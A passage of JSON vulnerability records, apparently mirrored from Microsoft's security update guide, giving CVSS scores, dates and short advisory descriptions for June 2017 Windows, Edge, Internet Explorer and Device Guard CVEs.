"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8473", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8473", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8473", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n\nTo exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.\n\nThe security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0297", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0297", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0297", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8478", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8478", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8478", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows Graphics component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nAn authenticated attacker could exploit this vulnerability by running a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Windows Graphics Component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-19T07:00:00", "type": "mscve", "title": "Microsoft Graphics Component Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8575", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8575", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8575", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "An Elevation of Privilege vulnerability exists when the Windows Graphics component improperly initializes contents in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows Graphics component initializes contents in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T07:00:00", "type": "mscve", "title": "Microsoft Graphics Component Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8576"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8576", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8576", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8522", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8522", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8522", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. The attacker could also take advantage of compromised websites, or websites that accept or host user-provided content or advertisements, by adding specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Internet Explorer Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8519", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8519", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8519", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8496", "CVE-2017-8529"], "modified": "2017-08-23T07:00:00", "id": "MS:CVE-2017-8496", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8496", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0216", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0216", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0216", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0219", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0219", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0219", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-0215"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0215", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0215", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8531", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8531", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8531", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A vulnerability exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker could use this vulnerability to trick a user into loading a web page with malicious content.\n\nTo exploit the vulnerability, an attacker must either trick a user into loading a web page or visit a website. The web page could also be injected into a compromised website or ad network.\n\nThe security update addresses the vulnerability by correcting how the CSP validates documents.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "CVE-2017-8555", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8555", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8555", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8555", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8532", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8532", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8532", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins. The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how affected Microsoft Edge handles different-origin requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8530", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8530", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8530", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. The attacker could also take advantage of compromised websites, or websites that accept or host user-provided content or advertisements, by adding specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.\n", 